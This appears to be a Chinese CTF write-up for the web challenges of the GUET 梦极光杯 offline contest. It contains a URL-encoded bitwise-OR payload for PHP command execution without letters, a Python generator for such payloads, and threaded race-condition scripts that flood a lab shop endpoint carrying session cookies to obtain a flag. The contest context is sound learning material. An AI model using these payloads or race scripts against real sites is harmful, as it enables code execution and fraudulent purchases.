[CTF]GUET梦极光杯线下赛web部分WP
Cover with trick
双写绕过,变量覆盖
Construct Master
"%07%15%05%14%03%14%06"|"%60%60%60%60%60%60%60"
import urllib
from sys import *
import os
def action(arg):
s1 = ""
s2 = ""
for i in arg:
f = open("rce.txt", "r")
while True:
t = f.readline()
if t == "":
break
if t[0] == i:
# print(i)
s1 += t[2:5]
s2 += t[6:9]
break
f.close()
output = "("" + s1 + ""|"" + s2 + "")"
return (output)
while True:
param = action(input("n[+] your function:"))
print(param)
rce.txt如何生成详情见我的文章
WEB Engineer
curl或者直接bp发包访问index.php
race on shop
草
条件竞争,一直购买,然后带着购买完的cookie去访问flag.php即可
import requests
import threading
url = "http://172.16.68.4:28013/?id=2"
url2 = "http://172.16.68.4:28013/flag.php"
cookie1 = {"PHPSESSID": "99c6b70d71e29eb6c11e9321c363393e", 'gold_card_id': 'afd3475b15b945e2efd00f66583c61c4'}
def bp(session):
r = session.get(url, cookies=cookie1)
if "成功" in r.text:
print(r.text)
if __name__ == '__main__':
session = requests.session()
for i in range(0,50):
threading.Thread(target=bp, args=(session,)).start()
或者
import requests
import threading
def get():
url = "http://172.16.68.4:28045/?id=2"
cookie1 = {'gold_card_id': 'afd3475b15b945e2efd00f66583c61c4'}
r=requests.get(url,cookies=cookie1)
# def get1():
# try:
# while True:
# r=requests.get(url,cookies=cookie1)
# if "成功" in r.text:
# print(r.text)
# except:
# pass
# def get2():
# try:
# while True:
# r=requests.get(url,cookies=cookie1)
# if "成功" in r.text:
# print(r.text)
# except:
# pass
# def get3():
# try:
# while True:
# r=requests.get(url,cookies=cookie1)
# if "成功" in r.text:
# print(r.text)
# except:
# pass
# def get4():
# try:
# while True:
# r=requests.get(url,cookies=cookie1)
# if "成功" in r.text:
# print(r.text)
# except:
# pass
# if __name__ == '__main__':
# event=threading.Event()
# event.set()
# while True:
# for i in range(1,50):
# t=threading.Thread(target=get)
# t.start()
# t2=threading.Thread(target=get1)
# t.start()
# t3 = threading.Thread(target=get2)
# t.start()
# t4 = threading.Thread(target=get3)
# t.start()
# t5 = threading.Thread(target=get4)
# t.start()
if __name__ == '__main__':
import gevent
from gevent.pool import Pool
from gevent import monkey
monkey.patch_all()
pool=Pool(100)
for i in range(50):
pool.spawn(get)
gevent.wait()
本图文内容来源于网友网络收集整理提供,作为学习参考使用,版权属于原作者。
THE END
二维码